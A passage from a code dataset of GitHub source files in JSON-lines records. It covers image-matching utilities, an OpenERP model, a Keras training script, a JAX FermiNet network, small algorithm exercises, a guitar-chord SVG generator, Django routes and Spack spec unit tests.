False\n >>> filter_duplicate_namepair_matches = True\n >>> candidate_matches = get_automatch_candidates(\n ... cm_list, ranks_lt, directed, name_scoring=name_scoring,\n ... filter_reviewed=filter_reviewed,\n ... filter_duplicate_namepair_matches=filter_duplicate_namepair_matches,\n ... ibs=ibs)\n >>> print(candidate_matches)\n\n Example3:\n >>> # UNSTABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qaid_list = ibs.get_valid_aids()[0:1]\n >>> daid_list = ibs.get_valid_aids()[10:100]\n >>> qaid2_cm = ibs.query_chips(qaid_list, daid_list, return_cm=True)\n >>> ranks_lt = 1\n >>> directed = False\n >>> name_scoring = False\n >>> filter_reviewed = False\n >>> filter_duplicate_namepair_matches = True\n >>> candidate_matches = get_automatch_candidates(\n ... cm_list, ranks_lt, directed, name_scoring=name_scoring,\n ... filter_reviewed=filter_reviewed,\n ... filter_duplicate_namepair_matches=filter_duplicate_namepair_matches,\n ... ibs=ibs)\n >>> print(candidate_matches)\n\n Example4:\n >>> # UNSTABLE_DOCTEST\n >>> from ibeis.expt.results_organizer import * # NOQA\n >>> import ibeis\n >>> ibs = ibeis.opendb('PZ_MTEST')\n >>> qaid_list = ibs.get_valid_aids()[0:10]\n >>> daid_list = ibs.get_valid_aids()[0:10]\n >>> qres_list = ibs.query_chips(qaid_list, daid_list)\n >>> ranks_lt = 3\n >>> directed = False\n >>> name_scoring = False\n >>> filter_reviewed = False\n >>> filter_duplicate_namepair_matches = True\n >>> candidate_matches = get_automatch_candidates(\n ... qaid2_cm, ranks_lt, directed, name_scoring=name_scoring,\n ... filter_reviewed=filter_reviewed,\n ... filter_duplicate_namepair_matches=filter_duplicate_namepair_matches,\n ... ibs=ibs)\n >>> print(candidate_matches)\n \"\"\"\n import vtool as vt\n from ibeis.model.hots import chip_match\n print(('[resorg] get_automatch_candidates('\n 'filter_reviewed={filter_reviewed},'\n 'filter_duplicate_namepair_matches={filter_duplicate_namepair_matches},'\n 'directed={directed},'\n 'ranks_lt={ranks_lt},'\n ).format(**locals()))\n print('[resorg] len(cm_list) = %d' % (len(cm_list)))\n qaids_stack = []\n daids_stack = []\n ranks_stack = []\n scores_stack = []\n\n # For each QueryResult, Extract inspectable candidate matches\n if isinstance(cm_list, dict):\n cm_list = list(cm_list.values())\n\n for cm in cm_list:\n if isinstance(cm, chip_match.ChipMatch2):\n daids = cm.get_top_aids(ntop=ranks_lt)\n scores = cm.get_top_scores(ntop=ranks_lt)\n ranks = np.arange(len(daids))\n qaids = np.full(daids.shape, cm.qaid, dtype=daids.dtype)\n else:\n (qaids, daids, scores, ranks) = cm.get_match_tbldata(\n ranks_lt=ranks_lt, name_scoring=name_scoring, ibs=ibs)\n qaids_stack.append(qaids)\n daids_stack.append(daids)\n scores_stack.append(scores)\n ranks_stack.append(ranks)\n\n # Stack them into a giant array\n # utool.embed()\n qaid_arr = np.hstack(qaids_stack)\n daid_arr = np.hstack(daids_stack)\n score_arr = np.hstack(scores_stack)\n rank_arr = np.hstack(ranks_stack)\n\n # Sort by scores\n sortx = score_arr.argsort()[::-1]\n qaid_arr = qaid_arr[sortx]\n daid_arr = daid_arr[sortx]\n score_arr = score_arr[sortx]\n rank_arr = rank_arr[sortx]\n\n if filter_reviewed:\n _is_reviewed = ibs.get_annot_pair_is_reviewed(qaid_arr.tolist(), daid_arr.tolist())\n is_unreviewed = ~np.array(_is_reviewed, dtype=np.bool)\n qaid_arr = qaid_arr.compress(is_unreviewed)\n daid_arr = daid_arr.compress(is_unreviewed)\n score_arr = score_arr.compress(is_unreviewed)\n rank_arr = rank_arr.compress(is_unreviewed)\n\n # Remove directed edges\n if not directed:\n #nodes = np.unique(directed_edges.flatten())\n directed_edges = np.vstack((qaid_arr, daid_arr)).T\n #idx1, idx2 = vt.intersect2d_indices(directed_edges, directed_edges[:, ::-1])\n\n unique_rowx = vt.find_best_undirected_edge_indexes(directed_edges, score_arr)\n\n qaid_arr = qaid_arr.take(unique_rowx)\n daid_arr = daid_arr.take(unique_rowx)\n score_arr = score_arr.take(unique_rowx)\n rank_arr = rank_arr.take(unique_rowx)\n\n # Filter Double Name Matches\n if filter_duplicate_namepair_matches:\n qnid_arr = ibs.get_annot_nids(qaid_arr)\n dnid_arr = ibs.get_annot_nids(daid_arr)\n if not directed:\n directed_name_edges = np.vstack((qnid_arr, dnid_arr)).T\n unique_rowx2 = vt.find_best_undirected_edge_indexes(directed_name_edges, score_arr)\n else:\n namepair_id_list = np.array(vt.compute_unique_data_ids_(list(zip(qnid_arr, dnid_arr))))\n unique_namepair_ids, namepair_groupxs = vt.group_indices(namepair_id_list)\n score_namepair_groups = vt.apply_grouping(score_arr, namepair_groupxs)\n unique_rowx2 = np.array(sorted([\n groupx[score_group.argmax()]\n for groupx, score_group in zip(namepair_groupxs, score_namepair_groups)\n ]), dtype=np.int32)\n qaid_arr = qaid_arr.take(unique_rowx2)\n daid_arr = daid_arr.take(unique_rowx2)\n score_arr = score_arr.take(unique_rowx2)\n rank_arr = rank_arr.take(unique_rowx2)\n\n candidate_matches = (qaid_arr, daid_arr, score_arr, rank_arr)\n return candidate_matches\n\n\nif __name__ == '__main__':\n \"\"\"\n CommandLine:\n python -m ibeis.expt.results_organizer\n python -m ibeis.expt.results_organizer --allexamples\n python -m ibeis.expt.results_organizer --allexamples --noface --nosrc\n \"\"\"\n import multiprocessing\n multiprocessing.freeze_support() # for win32\n import utool as ut # NOQA\n ut.doctest_funcs()\n","repo_name":"smenon8/ibeis","sub_path":"_broken/results_organizer.py","file_name":"results_organizer.py","file_ext":"py","file_size_in_byte":19792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"24992729651","text":"from osv import osv\nfrom osv import fields\n\nclass res_partner_crm_analytic(osv.osv):\n \"\"\"\n Define one analytic account by section,\n to disable the analytic account for a section, add line with section and\n not fill the analytic account\n \"\"\"\n _name = 'res.partner.crm.analytic'\n _description = 'CRM Partner Analytic Account'\n\n _columns = {\n 'partner_id': fields.many2one('res.partner', 'Partner', required=True),\n 'crm_model_id': fields.many2one('crm.analytic.timesheet.configuration', 'Model', required=True, help=\"Model of crm\"),\n 'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account',\\\n ondelete='cascade',\\\n help=\"Ananlytic account by default for this model of crm and for this partner\",\\\n domain=\"[('partner_id', '=', partner_id), ('state', '=', 'open'), ('type', '=', 'normal')]\"),\n }\n\nres_partner_crm_analytic()\n\nclass res_partner(osv.osv):\n \"\"\"\n Add a new tab on partner, to select the analytic account by section\n \"\"\"\n _inherit = 'res.partner'\n\n _columns = {\n 'crm_analytic_ids': fields.one2many('res.partner.crm.analytic', 'partner_id', 'CRM Analytic Account'),\n }\n\nres_partner()\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"factorlibre/openerp-extra-6.1","sub_path":"crm_timesheet/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"15378188138","text":"from sys import stdin, stdout \n\ndef sumDigits(n):\n n = int(n)\n sum = 0\n while n:\n sum += n % 10\n n //= 10\n return sum\n\ndef main():\n n = -1\n while True:\n n = int(stdin.readline())\n if n == 0:\n break\n status = False\n p = 10\n check = sumDigits(n)\n while not status:\n p += 1\n x = sumDigits(p * n)\n if(x == check):\n status = True\n stdout.write(\"%s\" % p + \"\\n\")\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"shakeelsamsu/kattis","sub_path":"src/easiest.py","file_name":"easiest.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"29921630143","text":"from tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.callbacks import *\nfrom CovidDWNet import CovidDWNet\n\ndef data_load(data_path):\n \n\n \n train_datagen = ImageDataGenerator(rescale=1./255)\n val_datagen = ImageDataGenerator(rescale = 1./255)\n \n \n train_generator = train_datagen.flow_from_directory(data_path+'/train',\n target_size=(128, 128), \n batch_size = 32, \n shuffle = True,class_mode='categorical')\n \n val_generator = val_datagen.flow_from_directory(data_path+'/test',\n target_size=(128, 128),\n batch_size =32,\n shuffle =False,class_mode='categorical')\n return train_generator,val_generator \n \n\ndef train(data_path):\n BS=32\n EPOCHS=200 \n \n train_generator,val_generator=data_load(data_path)\n model = CovidDWNet(inpt_shape = (128, 128, 3), num_class = 4)\n #model.summary() \n \n fname=\"checkpoint/our_model.h5\" \n callbacks = ModelCheckpoint(fname, monitor=\"val_accuracy\", mode=\"max\",\n save_best_only=True, verbose=1)#,save_freq=50*(train_generator.samples//BS))\n callbacks=[callbacks]\n \n H = model.fit_generator(\n train_generator,\n steps_per_epoch=train_generator.samples//BS,\n validation_data=val_generator,\n validation_steps=val_generator.samples//BS,\n epochs=200,\n initial_epoch=0,\n verbose=1,callbacks=callbacks)\n\n\n\nif __name__ == '__main__':\n data_path='data'\n train(data_path)","repo_name":"GaffariCelik/Covid-19","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30548480801","text":"import jax\nimport jax.numpy as jnp\nimport haiku as hk\n\nclass FermiNet(hk.Module):\n def __init__(self, depth, spsize, tpsize, L, init_stddev=0.01):\n super().__init__()\n self.depth = depth\n self.L = L\n self.init_stddev = init_stddev\n self.splayers = [hk.Linear(spsize, w_init=hk.initializers.RandomNormal(stddev=self.init_stddev))\n for _ in range(depth)]\n self.tplayers = [hk.Linear(tpsize, w_init=hk.initializers.RandomNormal(stddev=self.init_stddev))\n for _ in range(depth-1)]\n\n def _spstream0(self, x):\n \"\"\" Initial spstream, with shape (n, spsize0). \"\"\"\n return jnp.zeros_like(x)\n\n def _tpstream0(self, x):\n \"\"\" Initial tpstream, with shape (n, n, tpsize0). \"\"\"\n rij = x[:, None, :] - x\n cos_rij, sin_rij = jnp.cos(2*jnp.pi/self.L * rij), jnp.sin(2*jnp.pi/self.L * rij)\n n, _ = x.shape\n dij = jnp.linalg.norm(jnp.sin(jnp.pi/self.L * rij) + jnp.eye(n)[..., None], axis=-1) *(1.0 - jnp.eye(n))\n return jnp.concatenate((cos_rij, sin_rij, dij[..., None]), axis=-1)\n\n def _f(self, spstream, tpstream):\n \"\"\"\n The feature `f` as input to the sptream network.\n `f` has shape (n, fsize), where fsize = 2*spsize + tpsize.\n \"\"\"\n n, _ = spstream.shape\n f = jnp.concatenate((spstream,\n spstream.mean(axis=0, keepdims=True).repeat(n, axis=0),\n tpstream.mean(axis=1)), axis=-1)\n return f\n\n def __call__(self, x):\n spstream, tpstream = self._spstream0(x), self._tpstream0(x)\n\n for i in range(self.depth-1):\n f = self._f(spstream, tpstream)\n if i==0:\n spstream = jax.nn.softplus( self.splayers[i](f) )\n tpstream = jax.nn.softplus( self.tplayers[i](tpstream) )\n else:\n spstream += jax.nn.softplus( self.splayers[i](f) )\n tpstream += jax.nn.softplus( self.tplayers[i](tpstream) )\n\n f = self._f(spstream, tpstream)\n spstream += jax.nn.softplus( self.splayers[-1](f) )\n _, dim = x.shape\n final = hk.Linear(dim, w_init=hk.initializers.RandomNormal(stddev=self.init_stddev))\n return x + final(spstream)\n","repo_name":"fermiflow/CoulombGas","sub_path":"src/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"6"} +{"seq_id":"42560581692","text":"# Zero Matrix\n# Write an algorithm such that if an element in an M x N matrix is 0, its entire row and column are set to 0\n\ndef gen_square_matrix(n):\n return [list(map(lambda x: x+n*i, range(0, n))) for i in range(n)]\n\ndef zero_matrix(matrix):\n m = len(matrix)\n n = 0\n if m > 0:\n n = len(matrix[0])\n i_to_erase = []\n j_to_erase = []\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n i_to_erase.append(i)\n j_to_erase.append(j)\n for i in i_to_erase:\n for j in range(n):\n matrix[i][j] = 0\n for j in j_to_erase:\n for i in range(m):\n matrix[i][j] = 0\n\ndef zero_matrix_opti(matrix):\n m = len(matrix)\n n = 0\n if m > 0:\n n = len(matrix[0])\n first_row_to_erase = 0 in matrix[0] # we will use the first row to mark rows to delete, so we need to remember the state of it\n first_column_to_erase = 0 in [matrix[i][0] for i in range(m)] # idem for first column\n for i in range(1,m):\n for j in range(1,n):\n if matrix[i][j] == 0: # if element = 0, we mark the first column and row for future deletion\n matrix[i][0] = 0\n matrix[0][j] = 0\n for i in range(1,m): # we will erase first row/column after the rest of the matrix\n if matrix[i][0] == 0: # if row marked for deletion\n for j in range(1,n):\n matrix[i][j] = 0\n for j in range(1,n):\n if matrix[0][j] == 0: # we will erase first row/column after the rest of the matrix\n for i in range(1,m): # if column marked for deletion\n matrix[i][j] = 0\n if first_column_to_erase: # now we can put 0 in the first column without altering the rest\n for i in range(m):\n matrix[i][0] = 0\n if first_row_to_erase: # now we can put 0 in the first row without altering the rest\n for j in range(n):\n matrix[0][j] = 0\n\n\nmatrix = gen_square_matrix(5)\nmatrix[0][0] = 1\nmatrix[1][0] = 0\nmatrix[0][4] = 0\nmatrix[2][2] = 0\nzero_matrix_opti(matrix)\nassert matrix == [[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 16, 0, 18, 0], [0, 21, 0, 23, 0]]","repo_name":"JSchoreels/CrackingTheCodingInterview","sub_path":"Chapter_1_ArraysString/ex_1_8_ZeroMatrix.py","file_name":"ex_1_8_ZeroMatrix.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16292430370","text":"from svg.svgDWG import svgDwg\r\nfrom svg.svgELLIPSE import svgEllipse\r\nfrom svg.svgRECT import svgRect\r\nfrom svg.svgTEXT import svgText\r\nfrom svgConstellation import svgConstellation\r\nfrom svgFretboard import svgFretboard\r\nfrom svgKey import svgKey\r\n\r\n\r\nPIXELS_PER_INCH = 100\r\nHBORDER = 0\r\nVBORDER = 0\r\n\r\nTOP_OFFSET = 0\r\n\r\nFONT_TO_PIXELS = 1.3\r\nHEIGHT_FONT_12 = 12 * FONT_TO_PIXELS\r\n\r\nVERTICAL_OFFSET = 1.2 * PIXELS_PER_INCH\r\n\r\nNUMBER_FRETS = 9\r\n\r\nwidth = 8.5 * PIXELS_PER_INCH - 2 * HBORDER\r\nheight = 11.0 * PIXELS_PER_INCH - 2 * VBORDER\r\n\r\nHORIZONTAL_OFFSET = width/2\r\n\r\ndwg = svgDwg( width , height )\r\n\r\n \r\n \r\n \r\ndiameter = .4 * PIXELS_PER_INCH\r\nxloc = .5 * PIXELS_PER_INCH\r\n\r\ntext_offset = .25 * PIXELS_PER_INCH\r\n\r\nFRETBOARD_OFFSET = 1.0 * PIXELS_PER_INCH\r\nCONSTELLATION_OFFSET = 0.4 * PIXELS_PER_INCH\r\n\r\nCIRCLE_SCALE = .8\r\n\r\n\r\nCHORD_7 = [0,4,7,10]\r\nCHORD_MAJ7 = [0,4,7,11]\r\nCHORD_MIN7B5 = [0,3,6,10]\r\nCHORD_MIN7 = [0,3,7,10]\r\n\r\n\r\n\r\nfret_arrays_all = [\r\n [\r\n ( \"D\" , \"Dm7\" , [ 5,5,3,5] ),\r\n ( \"G\" , \"G7\" , [ 3,5,3,4] ),\r\n ( \"C\" , \"Cmaj7\" , [ 3,3,2,4] ),\r\n ( \"F\" , \"Fmaj7\" , [ 1,3,2,2] ),\r\n ( \"B\" , \"Bm7b5\" , [ 5,5,3,4] ),\r\n ( \"E\" , \"E7\" , [ 0,5,6,4] ),\r\n ( \"A\" , \"Am7\" , [ 3,3,2,2] ),\r\n ],\r\n [\r\n ( \"E\" , \"Em7\" , [ 7,7,5,7] ),\r\n ( \"A\" , \"A7\" , [ 5,7,5,6] ),\r\n ( \"D\" , \"Dmaj7\" , [ 5,5,4,6] ),\r\n ( \"G\" , \"Gmaj7\" , [ 3,5,4,4] ),\r\n ( \"C#\" , \"C#m7b5\" , [ 7,7,5,6] ),\r\n ( \"F#\" , \"F#7\" , [ 2,7,8,6] ),\r\n ( \"B\" , \"Bm7\" , [ 5,5,4,4] ),\r\n ],\r\n ]\r\n\r\nsuffix = [\"iv7\" , \"VII7\" , \"III7\" , \"VII7\" , \"ii7b5\" , \"V7\" , \"i7\"]\r\nchord_pitches = [ CHORD_MIN7 , CHORD_7 , CHORD_MAJ7 , CHORD_MAJ7 , CHORD_MIN7B5 , CHORD_7 , CHORD_MIN7 ]\r\n\r\n\r\nfor idx in range(len(fret_arrays_all)) :\r\n array_idx = 0\r\n \r\n yloc = .75 * PIXELS_PER_INCH\r\n fret_arrays = fret_arrays_all[idx]\r\n for key_idx,text,frets in fret_arrays:\r\n \r\n key = svgKey( key_idx )\r\n pitches = chord_pitches[ array_idx ]\r\n \r\n dwg.add( svgConstellation( CIRCLE_SCALE * diameter ,\r\n xloc + CONSTELLATION_OFFSET ,\r\n yloc ,\r\n pitches ,\r\n key_text = key_idx ))\r\n \r\n dwg.add( svgFretboard( xloc + FRETBOARD_OFFSET ,\r\n yloc - diameter ,\r\n NUMBER_FRETS ,\r\n key.makeChordMatrix( frets ) ,\r\n ))\r\n \r\n text += \" (\" + suffix[ array_idx ] +\")\"\r\n dwg.add( svgText( xloc - text_offset , yloc , text , rotate=270.0 , fontSize = 15 ) )\r\n yloc += VERTICAL_OFFSET\r\n array_idx += 1\r\n xloc += HORIZONTAL_OFFSET\r\n \r\ndwg.draw()\r\n\r\n\r\n ","repo_name":"tcolgan/examples","sub_path":"python/svg/chordsLeavesAmBm.py","file_name":"chordsLeavesAmBm.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12774141643","text":"# count from 1 to 10\n\nnumber = 1\nwhile number <= 10:\n print(number)\n number += 1\n \n# sum of numbers in a list \n\nnumbers = [1, 2, 3, 4, 5]\nsum = 0\nindex = 0\nwhile index < len(numbers):\n sum += numbers[index]\n index += 1\nprint(sum)","repo_name":"AnantaJoy/Python-for-Geographers-v0.1","sub_path":"13-05-2023/Loops/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37406447502","text":"from django.urls import path,include\nfrom . import views\nurlpatterns = [\n path('login',views.user_login,name='user_login'),\n path('user_logout',views.user_logout,name='user_logout'),\n path('add_employee',views.add_employee,name='add_employee'),\n path('employee_listing',views.employee_listing,name='employee_listing'),\n path('add_salary',views.add_salary,name='add_salary'),\n path('employee_view/',views.employee_view,name='employee_view'),\n path('employee_update/',views.employee_update,name='employee_update'),\n path('employee_delete/',views.employee_delete,name='employee_delete'),\n]","repo_name":"mohammed-saleek/employee_managment_task","sub_path":"userapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"810856286","text":"'''Counts paths from a point to reach Origin\n\nYou are standing on a point (n, m) and you want to go to origin (0, 0) by taking steps either left or down i.e.\nfrom each point you are allowed to move either in (n-1, m) or (n, m-1). Find the number of paths from point to origin.\n\nExamples:\n\nInput : 3 6\nOutput : Number of Paths 84\n\nInput : 3 0\nOutput : Number of Paths 1'''\n\ndef countPaths(n, m):\n if n == 0 or m == 0:\n return 1\n return countPaths(n-1, m) + countPaths(n, m-1)\n\n#Another approach\ndef countPaths(n, m):\n\n dp = [[0 for _ in range(m+1)] for _ in range(n+1)]\n for i in range(0, n+1):\n for j in range(0, m+1):\n if i == 0 or j == 0:\n dp[i][j] = 1\n else:\n dp[i][j] = dp[i-1][j] + dp[i][j-1]\n return dp[n][m]\n\n\nn = 3\nm = 2\nprint(\" Number of Paths \", countPaths(n, m))\n\nn = 3\nm = 6\nprint(\" Number of Paths \", countPaths(n, m))\n\nn = 3\nm = 0\nprint(\" Number of Paths \", countPaths(n, m))\n","repo_name":"Saima-Chaity/Leetcode","sub_path":"Geekforgeeks/Counts paths from a point to reach Origin.py","file_name":"Counts paths from a point to reach Origin.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72497472189","text":"import json, bge\n\nvideo_playback_list = []\nlow_frequency_callbacks = []\nheight_frequency_callbacks = []\n\nLOW_FREQUENCY_TICK = 0.06\nHEIGHT_FREQUENCY_TICK = 0.02\n\nproject_data = None\n\ndef loadProjectFile():\n\tpath = bge.logic.expandPath('//../project.json')\n\n\tglobal project_data\n\ttry:\n\t\twith open(path) as json_file: project_data = json.load(json_file)\n\texcept Exception as e: \n\t\tprint(str(e))\n\t\t\ndef __init__():\n\tloadProjectFile()\n\t\n__init__()","repo_name":"elmeunick9/UPBGE-CommunityAddon","sub_path":"project/core/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"23528457781","text":"import spack.architecture\nfrom spack.spec import *\nfrom spack.test.mock_packages_test import *\n\n\nclass SpecSematicsTest(MockPackagesTest):\n \"\"\"This tests satisfies(), constrain() and other semantic operations\n on specs.\"\"\"\n\n # ========================================================================\n # Utility functions to set everything up.\n # ========================================================================\n def check_satisfies(self, spec, anon_spec, concrete=False):\n left = Spec(spec, concrete=concrete)\n try:\n right = Spec(anon_spec) # if it's not anonymous, allow it.\n except:\n right = parse_anonymous_spec(anon_spec, left.name)\n\n # Satisfies is one-directional.\n self.assertTrue(left.satisfies(right))\n self.assertTrue(left.satisfies(anon_spec))\n\n # if left satisfies right, then we should be able to consrain\n # right by left. Reverse is not always true.\n right.copy().constrain(left)\n\n def check_unsatisfiable(self, spec, anon_spec, concrete=False):\n left = Spec(spec, concrete=concrete)\n try:\n right = Spec(anon_spec) # if it's not anonymous, allow it.\n except:\n right = parse_anonymous_spec(anon_spec, left.name)\n\n self.assertFalse(left.satisfies(right))\n self.assertFalse(left.satisfies(anon_spec))\n\n self.assertRaises(UnsatisfiableSpecError, right.copy().constrain, left)\n\n def check_constrain(self, expected, spec, constraint):\n exp = Spec(expected)\n spec = Spec(spec)\n constraint = Spec(constraint)\n spec.constrain(constraint)\n self.assertEqual(exp, spec)\n\n def check_constrain_changed(self, spec, constraint):\n spec = Spec(spec)\n self.assertTrue(spec.constrain(constraint))\n\n def check_constrain_not_changed(self, spec, constraint):\n spec = Spec(spec)\n self.assertFalse(spec.constrain(constraint))\n\n def check_invalid_constraint(self, spec, constraint):\n spec = Spec(spec)\n constraint = Spec(constraint)\n self.assertRaises(UnsatisfiableSpecError, spec.constrain, constraint)\n\n # ========================================================================\n # Satisfiability\n # ========================================================================\n def test_satisfies(self):\n self.check_satisfies('libelf@0.8.13', '@0:1')\n self.check_satisfies('libdwarf^libelf@0.8.13', '^libelf@0:1')\n\n def test_satisfies_namespace(self):\n self.check_satisfies('builtin.mpich', 'mpich')\n self.check_satisfies('builtin.mock.mpich', 'mpich')\n\n # TODO: only works for deps now, but shouldn't we allow for root spec?\n # self.check_satisfies('builtin.mock.mpich', 'mpi')\n\n self.check_satisfies('builtin.mock.mpich', 'builtin.mock.mpich')\n\n self.check_unsatisfiable('builtin.mock.mpich', 'builtin.mpich')\n\n def test_satisfies_namespaced_dep(self):\n \"\"\"Ensure spec from same or unspecified namespace satisfies namespace\n constraint.\"\"\"\n self.check_satisfies('mpileaks ^builtin.mock.mpich', '^mpich')\n\n self.check_satisfies('mpileaks ^builtin.mock.mpich', '^mpi')\n self.check_satisfies(\n 'mpileaks ^builtin.mock.mpich', '^builtin.mock.mpich')\n\n self.check_unsatisfiable(\n 'mpileaks ^builtin.mock.mpich', '^builtin.mpich')\n\n def test_satisfies_compiler(self):\n self.check_satisfies('foo%gcc', '%gcc')\n self.check_satisfies('foo%intel', '%intel')\n self.check_unsatisfiable('foo%intel', '%gcc')\n self.check_unsatisfiable('foo%intel', '%pgi')\n\n def test_satisfies_compiler_version(self):\n self.check_satisfies('foo%gcc', '%gcc@4.7.2')\n self.check_satisfies('foo%intel', '%intel@4.7.2')\n\n self.check_satisfies('foo%pgi@4.5', '%pgi@4.4:4.6')\n self.check_satisfies('foo@2.0%pgi@4.5', '@1:3%pgi@4.4:4.6')\n\n self.check_unsatisfiable('foo%pgi@4.3', '%pgi@4.4:4.6')\n self.check_unsatisfiable('foo@4.0%pgi', '@1:3%pgi')\n self.check_unsatisfiable('foo@4.0%pgi@4.5', '@1:3%pgi@4.4:4.6')\n\n self.check_satisfies('foo %gcc@4.7.3', '%gcc@4.7')\n self.check_unsatisfiable('foo %gcc@4.7', '%gcc@4.7.3')\n\n def test_satisfies_architecture(self):\n self.check_satisfies(\n 'foo platform=test target=frontend os=frontend',\n 'platform=test target=frontend os=frontend')\n self.check_satisfies(\n 'foo platform=test target=backend os=backend',\n 'platform=test target=backend', 'platform=test os=backend')\n self.check_satisfies(\n 'foo platform=test target=default_target os=default_os',\n 'platform=test target=default_target os=default_os')\n\n def test_satisfies_dependencies(self):\n self.check_satisfies('mpileaks^mpich', '^mpich')\n self.check_satisfies('mpileaks^zmpi', '^zmpi')\n\n self.check_unsatisfiable('mpileaks^mpich', '^zmpi')\n self.check_unsatisfiable('mpileaks^zmpi', '^mpich')\n\n def test_satisfies_dependency_versions(self):\n self.check_satisfies('mpileaks^mpich@2.0', '^mpich@1:3')\n self.check_unsatisfiable('mpileaks^mpich@1.2', '^mpich@2.0')\n\n self.check_satisfies(\n 'mpileaks^mpich@2.0^callpath@1.5', '^mpich@1:3^callpath@1.4:1.6')\n self.check_unsatisfiable(\n 'mpileaks^mpich@4.0^callpath@1.5', '^mpich@1:3^callpath@1.4:1.6')\n self.check_unsatisfiable(\n 'mpileaks^mpich@2.0^callpath@1.7', '^mpich@1:3^callpath@1.4:1.6')\n self.check_unsatisfiable(\n 'mpileaks^mpich@4.0^callpath@1.7', '^mpich@1:3^callpath@1.4:1.6')\n\n def test_satisfies_virtual_dependencies(self):\n self.check_satisfies('mpileaks^mpi', '^mpi')\n self.check_satisfies('mpileaks^mpi', '^mpich')\n\n self.check_satisfies('mpileaks^mpi', '^zmpi')\n self.check_unsatisfiable('mpileaks^mpich', '^zmpi')\n\n def test_satisfies_virtual_dependency_versions(self):\n self.check_satisfies('mpileaks^mpi@1.5', '^mpi@1.2:1.6')\n self.check_unsatisfiable('mpileaks^mpi@3', '^mpi@1.2:1.6')\n\n self.check_satisfies('mpileaks^mpi@2:', '^mpich')\n self.check_satisfies('mpileaks^mpi@2:', '^mpich@3.0.4')\n self.check_satisfies('mpileaks^mpi@2:', '^mpich2@1.4')\n\n self.check_satisfies('mpileaks^mpi@1:', '^mpich2')\n self.check_satisfies('mpileaks^mpi@2:', '^mpich2')\n\n self.check_unsatisfiable('mpileaks^mpi@3:', '^mpich2@1.4')\n self.check_unsatisfiable('mpileaks^mpi@3:', '^mpich2')\n self.check_unsatisfiable('mpileaks^mpi@3:', '^mpich@1.0')\n\n def test_satisfies_matching_variant(self):\n self.check_satisfies('mpich+foo', 'mpich+foo')\n self.check_satisfies('mpich~foo', 'mpich~foo')\n self.check_satisfies('mpich foo=1', 'mpich foo=1')\n\n # confirm that synonymous syntax works correctly\n self.check_satisfies('mpich+foo', 'mpich foo=True')\n self.check_satisfies('mpich foo=true', 'mpich+foo')\n self.check_satisfies('mpich~foo', 'mpich foo=FALSE')\n self.check_satisfies('mpich foo=False', 'mpich~foo')\n\n def test_satisfies_unconstrained_variant(self):\n # only asked for mpich, no constraints. Either will do.\n self.check_satisfies('mpich+foo', 'mpich')\n self.check_satisfies('mpich~foo', 'mpich')\n self.check_satisfies('mpich foo=1', 'mpich')\n\n def test_unsatisfiable_variants(self):\n # This case is different depending on whether the specs are concrete.\n\n # 'mpich' is not concrete:\n self.check_satisfies('mpich', 'mpich+foo', False)\n self.check_satisfies('mpich', 'mpich~foo', False)\n self.check_satisfies('mpich', 'mpich foo=1', False)\n\n # 'mpich' is concrete:\n self.check_unsatisfiable('mpich', 'mpich+foo', True)\n self.check_unsatisfiable('mpich', 'mpich~foo', True)\n self.check_unsatisfiable('mpich', 'mpich foo=1', True)\n\n def test_unsatisfiable_variant_mismatch(self):\n # No matchi in specs\n self.check_unsatisfiable('mpich~foo', 'mpich+foo')\n self.check_unsatisfiable('mpich+foo', 'mpich~foo')\n self.check_unsatisfiable('mpich foo=1', 'mpich foo=2')\n\n def test_satisfies_matching_compiler_flag(self):\n self.check_satisfies('mpich cppflags=\"-O3\"', 'mpich cppflags=\"-O3\"')\n self.check_satisfies('mpich cppflags=\"-O3 -Wall\"',\n 'mpich cppflags=\"-O3 -Wall\"')\n\n def test_satisfies_unconstrained_compiler_flag(self):\n # only asked for mpich, no constraints. Any will do.\n self.check_satisfies('mpich cppflags=\"-O3\"', 'mpich')\n\n def test_unsatisfiable_compiler_flag(self):\n # This case is different depending on whether the specs are concrete.\n\n # 'mpich' is not concrete:\n self.check_satisfies('mpich', 'mpich cppflags=\"-O3\"', False)\n\n # 'mpich' is concrete:\n self.check_unsatisfiable('mpich', 'mpich cppflags=\"-O3\"', True)\n\n def test_unsatisfiable_compiler_flag_mismatch(self):\n # No matchi in specs\n self.check_unsatisfiable(\n 'mpich 